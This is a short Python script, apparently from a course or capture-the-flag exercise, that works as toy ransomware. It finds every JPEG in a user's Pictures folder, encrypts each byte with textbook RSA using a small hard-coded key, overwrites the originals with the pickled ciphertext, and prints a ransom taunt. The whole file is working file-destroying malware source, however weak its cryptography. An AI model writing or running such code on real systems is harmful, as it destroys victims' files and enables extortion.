#!/usr/bin/python3
import glob
import pickle
def rsa_encrypt(filename):
    n = 22291846172619859445381409012451
    e = 65535
    plain_bytes = b''
    with open(filename, 'rb') as f:
        plain_bytes = f.read()
    #print(filename, len(plain_bytes), "bytes")
    cipher_int = [pow(i, e, n) for i in plain_bytes]
    with open(filename, 'wb') as f:
        pickle.dump(cipher_int, f)

jpgFilenamesList = glob.glob('/home/csc2021/Pictures/*.jpg')
for filename in jpgFilenamesList:
    rsa_encrypt(filename)
print("Give me ransom HAHA!")